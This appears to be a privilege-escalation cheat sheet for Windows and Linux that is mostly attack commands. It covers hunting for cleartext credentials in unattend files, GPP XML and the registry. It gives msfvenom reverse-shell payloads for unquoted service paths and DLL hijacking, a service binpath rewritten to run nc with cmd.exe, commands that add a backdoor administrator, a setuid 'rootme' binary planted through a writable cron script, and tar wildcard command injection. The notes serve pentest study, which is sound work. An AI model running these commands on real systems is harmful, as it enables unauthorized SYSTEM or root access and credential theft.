image

Windows

Kernel Exploits

  • systeminfo -> look up missing kb's
  • systeminfo | findstr /B /C:"OS Name" /C:"OS * Version"`
  • sherlock -> Find-AllVulns powershell
  • 0xsp Mongoose

Common Kernel Exploits

creds in cleartext or base64 -> once windows in installed
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

GPP(Group Policy Preferences)

Only applicable for devices connected to a domain

Groups.xml`stored in SYSVOL -> DC
  encrypted with AES, but key got leaked
 \\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups`

Other Files

Services\Services.xml
ScheduldedTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

Other Misc Passwords

dir /s *pass* == *cred* == *vnc* == *.config*
 findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
web.config
php.ini
httpd.conf
access.log

powerup:

  • Get-WebConfig (ISS > web.config

putty:

  • reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

Tight VNC:

  • reg query HKCU\Software\TightVNC\Server
  • bncpwd.exe

Always Install Elevated:

  • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
  • reg query HKCU\SOFTWARE\Policies\Micorosft\Windows\Installer\AlwaysInstalledElevated
    • both values = 1, created a malicious .msi file with msfvenom for example
    • execute it with msiexec /quiet /qn /i <filename>

powerup:

  • Get-RegistryAlwaysInstallElevated
  • Write-UserAddMSI

Unquoted Services Paths (trusted service paths)

For each space in a file path, windows will attempt to look for and execute programs with a name that matches the word in front of the space.

Example:

  • C:\Program Files\Some Folder\Service.exe
  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

PFNet

* C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
* icalcs "C:\Program Files (x86)\Privacyware"
* msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe

Start and stop the service:

  • sc stop PFNet
  • sc start PFNET

Powerup:

  • Get-ServiceUnquoted
  • Write-ServiceBinary -Name -Path

Insecure Service Permissions

whoami > net user <name>` \- enumerate groups
accesschk.exe` -> part of sysinternals
accesschk.exe -ucqv <service>
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Write access to a service as authenticated user?

W-XP ssdprsv and upnphost by default:

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost

Powerup:

  • Get-ModifiableService
  • Test-ServiceDaclPermission
  • Invoke-ServiceAbuse -Name -Command

DLL Hijacking

Requires user interaction / reboot.

DLL search order on 32-bit systems:

1. The directory from which the application is loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory
6. Directories in the PATH environment variable

You can use procmon to look for vulnerable dll's using the following filters:

  • Result is NAME NOT FOUND Include
  • Path ends with .dll
echo %path%
icacls C:\Python27
accesssschk.exe -dqv "C:\Python27"
sc qc IKEEXT

Generate a malicious payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll

Windows 7 x86/64:

  • IKE and AuthIP IPsec Keying Modules (IKEEEXT) - wlbsctrl.dl

Powerup:

  • Find-PathDLLHijkack
  • Find-ProjcessDLLHijkack
  • Wire-HijkackDll

Schedulded tasks:

On server 2000, 2003, and XP, scheduled tasks are running as system. Are they calling any .exe's and can you overwrite?

  • accesschk.exe -dqv <folder>

Can you create a task yourself?

  • net start "Task Scheduler" at <hour> /interactive "path to evil exe"

Powerup:

  • Get-ModifiableScheduledTaskFile

Useful commands

* `hostname`
* `echo %username%`
* `whoami` / `priv`
* `swinsta` \- other logged in users
* `net users`
* `net user <username>`
* `net localgroup`
* `net localgroup Administrators`
* `net user rottenadmin P@ssword123! /add`
* `net localgroup Administrators rottenadmin /add`
* `ipconfing /all`
* `route print`
* `arp -a`
* `netstat -ano`
* `C:\WINDOWS\System32\drivers\etc\hosts`
* `schtasks /query /fo LIST /v` \- scheduled task
* `tasklist /SVC` \- running processes
* `net start` \- started services
* `cd\ & dir /b /s proof.txt`

Linux

Scripts & Tools

  • 0xsp Mongoose
  • Linux-Enum-Mod
  • linux-exploit-suggestor

Kernel Exploits

  • Mongoose 0xsp
  • uname -a -> searchsploit
  • linux-exploit-suggestor

Common Kernel Exploits

* `CVE-2010-2959`
* `cve-2020-8835`
* `CVE-2019-7304`
* `CVE - 2019-9213 2018-5333`

Services Running as root

  • ps -aux | grep root
  • any shell escape sequences?

SUID Executables

  • runs with permissions of the owner
  • find / -perm -u=s -type f 2>/dev/null
  • any shell escape sequences - do we have write access?

Sudo rights / users

  • sudo -l
  • what can we execute -> any shell escape sequences

Cron jobs

 find / -perm -2 -type f 2>/dev/null`
 ls -la /etc/cron.d`
# rootme.c
int main(void)
{
  setgid(0);
  setuid(0);
  execl("/bin/sh", "sh", 0);
}
gcc rootme.c -o rootme

echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh

Wildcards

  • often combined with user interaction / cronjobs
  • cfr. Back to the Future: Unix Wildcards Gone Wild paper
  • wild cards can be utilized to inject arbitrary command by creating files that are seen as commands

Example:

--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-actionexec=sh rshell.sh

Path Abuse ('.' in path)

Requires user interaction (eg somebody need to have . in their path)

* `$PATH:.:${PATH}`
* `export $PATH`
* `echo $PATH`
* replace executable files with a malicious one

Useful commands

* `ps aux | grep root`
* `crontab -l`
* `ifconfig -a`
* `cat /etc/resolv.conf`
* `netstat -tulpn`
* `arp -e`
* `route`
* `id`
* `who`
* `cat /etc/passwd | cut -d: -f1` \- list of users
* `cat ~/.ssh`
* `find . -name package.json -print -exec cat {} +`

Sources